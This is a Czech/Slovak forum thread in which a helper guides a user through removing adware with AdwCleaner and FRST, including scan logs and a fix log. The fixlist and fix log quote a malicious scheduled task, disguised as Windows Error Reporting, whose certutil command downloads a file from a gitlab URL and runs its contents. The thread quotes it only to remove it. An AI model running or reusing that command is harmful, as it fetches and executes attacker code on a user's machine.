S3 cbdhsvc;@%SystemRoot%\system32\cbdhsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 ConsentUxUserSvc;@%SystemRoot%\system32\ConsentUxClient.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 ConsentUxUserSvc_47a12;ConsentUX_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 DevicePickerUserSvc;@%SystemRoot%\system32\Windows.Devices.Picker.dll,-1006; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 DevicePickerUserSvc_47a12;DevicePicker_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 DevicesFlowUserSvc;@%SystemRoot%\system32\DevicesFlowBroker.dll,-103; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 DevicesFlowUserSvc_47a12;DevicesFlow_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 DevQueryBroker;@%SystemRoot%\system32\DevQueryBroker.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 diagnosticshub.standardcollector.service;@%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000; C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2019-08-27 92672]
S3 diagsvc;@%systemroot%\system32\DiagSvc.dll,-100; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 DmEnrollmentSvc;@%systemroot%\system32\Windows.Internal.Management.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 dmwappushservice;@%SystemRoot%\system32\dmwappushsvc.dll,-200; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 DsSvc;@%SystemRoot%\system32\dssvc.dll,-10003; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 embeddedmode;@%SystemRoot%\system32\embeddedmodesvc.dll,-201; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 EntAppSvc;@EnterpriseAppMgmtSvc.dll,-1; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 FontCache3.0.0.0;@%SystemRoot%\system32\PresentationHost.exe,-3309; C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe [2018-09-09 43632]
S3 FrameServer;@%systemroot%\system32\FrameServer.dll,-100; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 GoogleChromeElevationService;Google Chrome Elevation Service; C:\Program Files (x86)\Google\Chrome\Application\76.0.3809.132\elevation_service.exe [2019-08-24 1096176]
S3 GraphicsPerfSvc;@%SystemRoot%\system32\GraphicsPerfSvc.dll,-100; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-12-12 153168]
S3 HvHost;@%SystemRoot%\system32\hvhostsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 iaStorAfsService;@oem13.inf,%iaStorAfsWindowsService.Name%;Intel(R) Optane(TM) Memory Service; C:\WINDOWS\IAStorAfsService\iaStorAfsService.exe [2018-02-21 2593336]
S3 icssvc;@%SystemRoot%\System32\tetheringservice.dll,-4097; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 InstallService;@%SystemRoot%\system32\InstallService.dll,-200; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\SocketHeciServer.exe [2017-11-17 743728]
S3 IpxlatCfgSvc;@%Systemroot%\system32\ipxlatcfg.dll,-500; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 irmon;@%SystemRoot%\System32\irmon.dll,-2000; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 LxpSvc;@%SystemRoot%\system32\LanguageOverlayServer.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 MessagingService;@%SystemRoot%\system32\MessagingService.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 MessagingService_47a12;MessagingService_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 NaturalAuthentication;@%systemroot%\system32\NaturalAuth.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 NetSetupSvc;@%SystemRoot%\system32\NetSetupSvc.dll,-3; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 NgcCtnrSvc;@%SystemRoot%\System32\NgcCtnrSvc.dll,-1; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 NgcSvc;@%SystemRoot%\System32\ngcsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 NvContainerNetworkService;NVIDIA NetworkService Container; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2019-01-30 790920]
S3 ose64;Office 64 Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2018-06-13 189640]
S3 perceptionsimulation;@%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101; C:\WINDOWS\system32\PerceptionSimulation\PerceptionSimulationService.exe [2018-09-15 78848]
S3 PhoneSvc;@%SystemRoot%\system32\PhoneserviceRes.dll,-10000; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 PimIndexMaintenanceSvc;@%SystemRoot%\system32\UserDataAccessRes.dll,-15001; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 PrintWorkflowUserSvc;@%SystemRoot%\system32\PrintWorkflowService.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 PrintWorkflowUserSvc_47a12;PrintWorkflow_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 PSSvc;Predator Service; C:\Program Files\Acer\PredatorSense Service\PSSvc.exe [2018-07-26 939824]
S3 PushToInstall;@%SystemRoot%\system32\pushtoinstall.dll,-200; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 QALSvc;Quick Access Local Service; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [2018-03-09 466224]
S3 QASvc;Quick Access Service; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [2018-03-09 508208]
S3 RetailDemo;@%SystemRoot%\System32\RDXService.dll,-256; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 RmSvc;@%SystemRoot%\system32\RMapi.dll,-1001; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S3 SensorDataService;@%SystemRoot%\system32\SensorDataService.exe,-101; C:\WINDOWS\System32\SensorDataService.exe [2018-09-15 1269248]
S3 SensorService;@%SystemRoot%\System32\sensorservice.dll,-1000; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]

-----------------EOF-----------------

Re: Zapnutie prehliadača po spustení pc

Napsal: 17 zář 2019 18:54
od Rudy
Zdravím!
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi

Re: Zapnutie prehliadača po spustení pc

Napsal: 17 zář 2019 19:02
od mifoIV
# -------------------------------
# Malwarebytes AdwCleaner 7.4.1.0
# -------------------------------
# Build: 09-05-2019
# Database: 2019-09-17.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 09-17-2019
# Duration: 00:00:14
# OS: Windows 10 Home
# Scanned: 35626
# Detected: 46


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

PUP.Optional.AdvancedSystemCare C:\Users\mifoI\AppData\Roaming\IObit\Advanced SystemCare
PUP.Optional.DriverBooster C:\ProgramData\IOBIT\Driver Booster
PUP.Optional.DriverBooster C:\Users\mifoI\AppData\Roaming\IOBIT\Driver Booster
PUP.Optional.WebCompanion C:\ProgramData\Application Data\Lavasoft\Web Companion

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

PUP.Optional.Legacy C:\Windows\System32\Tasks\DRIVER BOOSTER SCHEDULER

***** [ Registry ] *****

PUP.Optional.DriverBooster HKLM\Software\Wow6432Node\IObit\Driver Booster
PUP.Optional.DriverBooster HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Driver Booster_is1
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\Main|Start Page
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9}
PUP.Optional.Legacy HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2270A0D4-FA20-496B-BB45-F64C91599E75}
PUP.Optional.Legacy HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster Scheduler
PUP.Optional.WebCompanion HKCU\Software\Lavasoft\Web Companion
PUP.Optional.WebCompanion HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
PUP.Optional.WebCompanion HKLM\Software\Wow6432Node\Lavasoft\Web Companion

***** [ Chromium (and derivatives) ] *****

PUP.Optional.DefaultSearch.ShrtCln Adaware Secure Search

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Preinstalled Software ] *****

Preinstalled.AcerCareCenter Folder C:\Program Files (x86)\ACER\CARE CENTER
Preinstalled.AcerCareCenter Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{30ED8C48-5198-43C4-9FB4-A0EE79848B99}
Preinstalled.AcerCareCenter Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{30ED8C48-5198-43C4-9FB4-A0EE79848B99}
Preinstalled.AcerCareCenter Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C92F19D3-9E1D-4648-8758-6E78980B18FF}
Preinstalled.AcerCareCenter Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ACCAgent
Preinstalled.AcerCareCenter Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ACCBackgroundApplication
Preinstalled.AcerCareCenter Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{1AF41E84-3408-499A-8C93-8891F0612719}
Preinstalled.AcerCareCenter Task C:\Windows\System32\Tasks\ACCAGENT
Preinstalled.AcerCareCenter Task C:\Windows\System32\Tasks\ACCBACKGROUNDAPPLICATION
Preinstalled.AcerCollection Folder C:\Program Files (x86)\ACER\ACER COLLECTION
Preinstalled.AcerCollection Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12268728-7CB3-4935-A0C9-797E9497031A}
Preinstalled.AcerCollection Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2E8C7817-48B7-4F3F-A6E6-7B57FE3E5E98}
Preinstalled.AcerCollection Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Acer Collection Application
Preinstalled.AcerCollection Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Acer Collection Monitor Application
Preinstalled.AcerCollection Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{8CD449EA-BBA0-477F-AFF9-9AF6E8C50EF2}
Preinstalled.AcerCollection Task C:\Windows\System32\Tasks\ACER COLLECTION APPLICATION
Preinstalled.AcerCollection Task C:\Windows\System32\Tasks\ACER COLLECTION MONITOR APPLICATION
Preinstalled.AcerConfigurationManager Folder C:\Program Files (x86)\ACER\AMUNDSEN\2.1.16258
Preinstalled.AcerConfigurationManager Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A719F711-055E-4534-8181-4BF2782A2548}
Preinstalled.AcerConfigurationManager Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AcerCMUpdateTask2.1.16258
Preinstalled.AcerConfigurationManager Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{414D554E-4453-454E-0201-000000016258}
Preinstalled.AcerConfigurationManager Task C:\Windows\System32\Tasks\ACERCMUPDATETASK2.1.16258
Preinstalled.AcerQuickAccess Folder C:\Program Files\ACER\ACER QUICK ACCESS
Preinstalled.AcerQuickAccess Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{8BBF04F1-C68A-441C-B5EF-446EE9960EAF}
Preinstalled.AcerUEIPFramework Folder C:\Program Files\ACER\USER EXPERIENCE IMPROVEMENT PROGRAM\FRAMEWORK
Preinstalled.AcerUEIPFramework Folder C:\Program Files\ACER\USER EXPERIENCE IMPROVEMENT PROGRAM\PLUGIN\APPMONITOR
Preinstalled.AcerUEIPFramework Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8BA3E840-157F-4A38-8AB1-4F37C96E63C2}
Preinstalled.AcerUEIPFramework Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UbtFrameworkService
Preinstalled.AcerUEIPFramework Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{12A718F2-2357-4D41-9E1F-18583A4745F7}
Preinstalled.AcerUEIPFramework Task C:\Windows\System32\Tasks\UBTFRAMEWORKSERVICE
Preinstalled.AcerUpdater Folder C:\ProgramData\ACER\ACER UPDATER


AdwCleaner_Debug.log - [14351 octets] - [17/09/2019 20:01:45]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########

Re: Zapnutie prehliadača po spustení pc

Napsal: 17 zář 2019 19:54
od Rudy
Všechny položky smažte, restartujte a dejte logy FRST+Addition: https://forum.viry.cz/viewtopic.php?f=13&t=154679 .

Re: Zapnutie prehliadača po spustení pc

Napsal: 17 zář 2019 20:24
od mifoIV
Mám zmazať aj tie Preinstalled.AcerCareCenter Folder a podobné acer veci?

Re: Zapnutie prehliadača po spustení pc

Napsal: 17 zář 2019 20:32
od mifoIV
Dal som logy to do rar v prílohe

Re: Zapnutie prehliadača po spustení pc

Napsal: 17 zář 2019 20:54
od Rudy
Pokud víte, že jsou regulérní, nemusíte. Otevřte poznámkový blok a zkopírujte do něj:

Start

CloseProcesses:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645456 2019-04-01] (Oracle America, Inc. -> Oracle Corporation)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {9BCC5217-D5E3-4B90-AF25-C0F14C1B43BC} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-12] (Google Inc -> Google Inc.)
Task: {E4925CA0-3454-4C42-B168-C8C3E70C0905} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\WindowsErrorReportingService => cmd /c certuti -urlcache -f hxxps://gitlab.com/rotlang/api/raw/master/api2 README.txt && for /f "delims=" %j in (README.txt) do %j && type nul > Readme.txt && DEL Readme.txt <==== ATTENTION
Task: {EB3B5F45-8A8A-4C39-B72B-4AA2C1DF2298} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-12] (Google Inc -> Google Inc.)
SearchScopes: HKU\S-1-5-21-2700800371-3206082216-2979768269-1001 -> DefaultScope {51FF1AE5-094C-40B3-AA7B-A51152766C43} URL =
SearchScopes: HKU\S-1-5-21-2700800371-3206082216-2979768269-1001 -> {7D24AFA3-9351-459E-A3A6-CCF21BFD8932} URL =
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> No File
ContextMenuHandlers1: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File

EmptyTemp:
End
Uložte do C:\Users\mifoI\OneDrive\Počítač jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.

Re: Zapnutie prehliadača po spustení pc

Napsal: 18 zář 2019 03:56
od mifoIV
Reštartoval sa po tom fixe notebook a operu ešte zaplo s reklamou

Fix result of Farbar Recovery Scan Tool (x64) Version: 14-09-2019
Ran by mifoI (18-09-2019 04:53:45) Run:1
Running from C:\Users\mifoI\OneDrive\Počítač
Loaded Profiles: mifoI (Available Profiles: mifoI)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645456 2019-04-01] (Oracle America, Inc. -> Oracle Corporation)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {9BCC5217-D5E3-4B90-AF25-C0F14C1B43BC} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-12] (Google Inc -> Google Inc.)
Task: {E4925CA0-3454-4C42-B168-C8C3E70C0905} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\WindowsErrorReportingService => cmd /c certuti -urlcache -f hxxps://gitlab.com/rotlang/api/raw/master/api2 README.txt && for /f "delims=" %j in (README.txt) do %j && type nul > Readme.txt && DEL Readme.txt <==== ATTENTION
Task: {EB3B5F45-8A8A-4C39-B72B-4AA2C1DF2298} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-12] (Google Inc -> Google Inc.)
SearchScopes: HKU\S-1-5-21-2700800371-3206082216-2979768269-1001 -> DefaultScope {51FF1AE5-094C-40B3-AA7B-A51152766C43} URL =
SearchScopes: HKU\S-1-5-21-2700800371-3206082216-2979768269-1001 -> {7D24AFA3-9351-459E-A3A6-CCF21BFD8932} URL =
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> No File
ContextMenuHandlers1: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File

EmptyTemp:
End

*****************

Processes closed successfully.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
HKLM\SOFTWARE\Policies\Mozilla => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9BCC5217-D5E3-4B90-AF25-C0F14C1B43BC}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9BCC5217-D5E3-4B90-AF25-C0F14C1B43BC}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E4925CA0-3454-4C42-B168-C8C3E70C0905}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E4925CA0-3454-4C42-B168-C8C3E70C0905}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Windows Error Reporting\WindowsErrorReportingService => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Windows Error Reporting\WindowsErrorReportingService" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EB3B5F45-8A8A-4C39-B72B-4AA2C1DF2298}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EB3B5F45-8A8A-4C39-B72B-4AA2C1DF2298}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKU\S-1-5-21-2700800371-3206082216-2979768269-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
HKU\S-1-5-21-2700800371-3206082216-2979768269-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{7D24AFA3-9351-459E-A3A6-CCF21BFD8932} => removed successfully
HKLM\Software\Classes\CLSID\{7D24AFA3-9351-459E-A3A6-CCF21BFD8932} => not found
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA" => not found
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore" => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => removed successfully
HKLM\Software\Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => removed successfully
HKLM\Software\Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => removed successfully
HKLM\Software\Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => removed successfully
HKLM\Software\Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => removed successfully
HKLM\Software\Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive6 => removed successfully
HKLM\Software\Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive7 => removed successfully
HKLM\Software\Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive6 => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive7 => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR => removed successfully
HKLM\Software\Classes\CLSID\[CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => removed successfully
HKLM\Software\Classes\CLSID\[CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => not found

=========== EmptyTemp: ==========

BITS transfer queue => 10510336 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 47583596 B
Java, Flash, Steam htmlcache => 292161811 B
Windows/system/drivers => 384709 B
Edge => 2778936 B
Chrome => 271457 B
Firefox => 11006876 B
Opera => 450915227 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
